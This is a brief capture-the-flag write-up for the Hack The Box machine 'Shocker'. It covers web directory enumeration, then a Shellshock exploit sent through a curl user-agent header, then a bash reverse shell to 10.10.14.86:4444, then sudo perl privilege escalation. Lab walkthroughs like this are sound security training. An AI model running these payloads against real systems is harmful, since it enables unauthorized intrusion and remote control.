Shocker

https://app.hackthebox.com/machines/Shocker

Starting with a NMAP, we see 2 ports open, mainly we see the HTTP web server on port 22.

Let's try to find directories:

dirb http://10.129.101.205

index does not seem so important ->

but the other directories are forbidden:

after further enumeration, i found this user.sh:

gobuster dir -u http://10.129.101.205/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .sh

and when we go on the resource, it DLs the file:

captured the packet where the script was:

found this super website https://www.sevenlayers.com/index.php/125-exploiting-shellshock

on how to exploit this type of environment:

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.90.59/cgi-bin/test.sh

so we got a RCE, let's try to abuse it. First we get a listener going:

after a bit of debug on the reverse shell user agent command:

() { ignored;};/bin/bash -i >& /dev/tcp/10.10.14.86/4444 0>&1

and the rest is history:

then quick enum for privesc:

Now we see we can run perl as sudo -> let's go see GTFObins

Ez win on this privesc ->

PreviousAnalyticsNextNibbles

Last updated